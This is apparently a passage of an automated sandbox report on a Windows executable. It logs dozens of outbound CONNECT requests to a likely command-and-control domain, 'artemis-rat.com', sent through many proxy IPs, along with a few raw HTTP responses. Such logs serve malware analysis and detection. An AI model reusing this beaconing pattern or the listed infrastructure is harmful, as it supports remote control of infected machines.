                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.24.0</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            865192.168.2.552366195.158.8.15031283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.054955006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.905030966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.093163013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.499154091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.405226946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.202095032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:00.092756033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            866192.168.2.550103159.223.71.71511873876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.056318998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.092612028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.093044996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.202147007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            867192.168.2.5523815.196.111.30200603876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.057544947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            868192.168.2.55184354.36.122.16445873876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.060964108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.179678917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            869192.168.2.55239572.195.34.4241453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.063137054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            870192.168.2.55239372.206.181.97649433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.063553095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            871192.168.2.552394174.64.199.7941453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.063554049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            872192.168.2.55239970.166.167.38577283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.065232038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            873192.168.2.55238591.211.177.3736293876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.067048073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            874192.168.2.552384176.123.56.5836293876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.067955017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            875192.168.2.552392121.159.146.251803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.071816921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            876192.168.2.55239882.113.157.122312803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.081943989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.811079979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            877192.168.2.55238683.243.92.15480803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.096415997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.904983997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            878192.168.2.55239758.234.116.197803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.098879099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            879192.168.2.55249361.130.9.384433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.112788916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            880192.168.2.55249561.130.9.384433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.113575935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            881192.168.2.55249861.130.9.384433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.114972115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            882192.168.2.552388103.83.232.122803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.115628004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            883192.168.2.55250061.130.9.384433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.115808010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            884192.168.2.55251243.134.164.1754433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.122780085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            885192.168.2.55251343.134.164.1754433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.124351025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            886192.168.2.55251443.134.164.1754433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.126228094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            887192.168.2.552402120.76.42.20988883876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.127859116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.456298113 CET767INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: Beaver
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 635
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            888192.168.2.55251543.134.164.1754433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.128067017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            889192.168.2.552390103.118.44.6180803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.142143965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            890192.168.2.55240158.234.116.19781973876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.197632074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            891192.168.2.55240379.119.155.6380803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.198849916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
